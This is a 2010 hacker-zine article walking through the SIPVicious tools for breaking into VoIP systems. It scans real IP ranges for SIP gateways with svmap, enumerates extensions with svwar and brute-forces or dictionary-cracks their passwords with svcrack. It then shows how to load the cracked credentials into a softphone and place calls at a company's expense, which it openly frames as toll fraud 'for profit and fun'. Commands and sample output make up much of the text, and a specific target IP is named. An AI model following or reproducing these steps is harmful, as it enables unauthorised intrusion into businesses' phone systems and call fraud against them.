__________ __ ________________ / _____/ \ / \/ _ \__ ___/___ _____ _____ \_____ \\ \/\/ / /_\ \| |_/ __ \\__ \ / \ / \\ / | \ |\ ___/ / __ \| Y Y \ /_______ / \__/\ /\____|__ /____| \___ >____ /__|_| / \/ \/ \/ \/ \/ \/ [ 1998 - 2010 - Hacking, Phreaking & Anarchy in the UK ] 11th February 2010 . Author -=The Firestarter=- ---------------------------------------------------------- [ SIPVicious & making free calls via the net ] ---------------------------------------------------------- Well i was hoping to run WarVOX to enable me to wardial a few numbers in the hope of locating some VMS to use and abuse for profit and fun. Somehow using skype just didn't cut it and using normal modem & foneline, was, well, too late 20th century for my liking. So i fired up my trusty eeePC into "hack mode" and watched as BT4 loaded itself up. Now time to take over someones VoIP gateway.... So what is SIPVicious? essentially its a collection of python scripts that are used to find and audit (re: crack) SIP servers - VoIP gateways basically. First script we will be using is used to find the gateways: svmap.py to use this we will need an IP range, i've found that its not 100% reliable if you scan 123.123.*.* at the default speed as it seems to miss bits and pieces, but scanning just the last octave ie 123.123.1.* and then 123.123.2.* etc etc usually yields better results if your into the default scan speed. doesn't take too long however with a spread sheet to help create a shell script (or batch file if your still using that shite os known as doze) to automate that. Ok, SIP gateways usually use the port 5060 but it can be wise to scan 5060-5062 just in case, scans don't take too long so the extra ports won't extend your scanning time by very much at all. actually i think because the scan is so fast that it seems to miss things every now and then, but by adding the -t command you can alter the timings, using: -t0.1 seems to do the trick it most occations, but will extend the scan time somewhat. but better we get accurate results than misses. Right, so we have some ranges which to scan, lets say 213.171.*.* You can scan this range and all the required ports with this command line: ./svmap.py -t0.1 -p5060-5062 213.171.*.* >>./sipscans.txt it will also save the scan results to a textfile called sipscans.txt - the -t0.1 is somewhat optional, having it too high will add eons to the scan time.you could also try -t0.05 the default setting is 0.005 that said however, i've found a hell of a lot more gateways by extending the time rather than going by the default timings. the -p flag as you've guessed it is for the port, by default it will only scan port 5060, but i like more results, so i'm going for 5060, 5061 & 5062 fire away and go grab a bottle of brew dog ale (or two) while the scan sweeps through all of the addesses, it will take a good few minutes, if like me your at the bottom end of the broadband scale. Once completed, check out the resulting text file, it should be full of entries and look somewhat like: | SIP Device | User Agent | Fingerprint | ------------------------------------------------------------------------------------- | 91.84.16.59:5060 | NCH Software Axon Virtual PBX 2.01 | NCH Swift Sound Axon 1.20 | Ok so we know which IP its on and which port, also what software is running on it, some seem to be set up more correctly than others, if you follow me. Next step is going to involve locating all of the extentions that are attached to this SIP device, for this we use the script: svwar.py This little beauty locates working extensions on the line as well as letting us know whether or not they need authentification to work or not. The command on a basic level: ./svwar.py -p5060 91.84.16.59 - worth noting that since its on the default port you don't really have to specify it as svwar.py defaults to port 5060 By default this will scan for extensions 100-999, you might wish to scan for other extensions, you can specify this with the -e tag, i.e -e1-9999 will scan for extentions 1 all the way up to 9999. but what if the extension is 0001 ? for this you add the flag -z this indicates how many zero's are padded into the number, so for a 4 digit extension scan you need to pad it with 4 zero's. i.e -z4 so if you wished to scan for 4 digit extensions, say if your first scan with svwar failed, you would use the command: ./svwar.py -p5060 -e1-9999 -z4 91.84.16.59 this would then almost certainly yield lots of results. Anyhow, once you have ran svwar on the target you will hopefully see something like this: | Extension | Authentication | ------------------------------ | 108 | reqauth | | 102 | reqauth | | 103 | reqauth | | 101 | reqauth | | 106 | reqauth | | 107 | reqauth | | 104 | reqauth | | 105 | reqauth | now its time to crack that authentification to gain access to the extension. For this test we will use: svcrack.py ./svcrack.py -u 101 -t0.1 91.84.16.59 the -u 101 flag is the user, or extension, so if you wanted to 0wn extension 108 you'd use -u 108 again the -t0.1 flag to slow things down. so much gets missed going at default speeds. it is possible to run a dictionary attack against the extension if the usual numeric methods fail. to use a dictionary in the attack use the -d flag to specify it, followed by the file name. i.e: ./svcrack.py -u101 -t0.1 -u 101 -d dictionary.txt 213.171.43.205 also worth noting that by default the cracker will only use 3 digits against the extention. To increase or change this range use the: -r flag and also the -z option for padding zeros might be a good idea. i.e so we might run: ./svcrack.py -u 101 -r1-9999 -z4 -t0.1 91.84.16.59 anyhow we just so happen to run svcrack.py with its default options and get... | Extension | Password | ------------------------ | 101 | 101 | Bing0wned! that was hard now wasn't it. muhahaha. ***Worth noting, sometimes it matters where abouts the -z and -t tags are in the command, so if using them and it fails, try move them!!*** But alls not over yet, time to test the little beauty, for this we will need a softphone, my personal choice was x-lite as ekiga that i've messed with in the past; is in my opinion, not too great. ok so what information do we have? username: 101 password: 101 SIP server: 96.84.16.59 In the x lite -> System Settings -> SIP Proxy -> Default enter the fields to something like this. Enabled = Yes Display Name = k-rad h4xx0r Username = 101 (extension you found) Authorization use = 101 (extension you found) Password : 101 (or whatever you find) Domain/Realm = 96.84.16.59 (IP of gateway) SIP Proxy = 96.84.16.59 (IP of gateway) Out Bound Proxy = 96.84.16.59 (IP of gateway) input all of that information into the relevent settings. if you need to fill in a STUN server, use something like stunserver.org - its free and works pretty well, although a lot of softphones have there own server details, i.e x-lite uses xten.net, i like to load them in as a primary and secondary servers. ok all that information filled in? fire up the account and see if it registers you. time to make some calls! one technique we like to use is an unregistered pre-payed mobile, that we can pick up for next to nothing from more or less anywhere. Simply try giving it a call, remember if you've 0wned some system in another county remember to use the country dialling code. Also try dialling 9 or some such thing for an outside line if you're having problems. Call gone thru? Congradulations you've just phrecked some companies PBX system!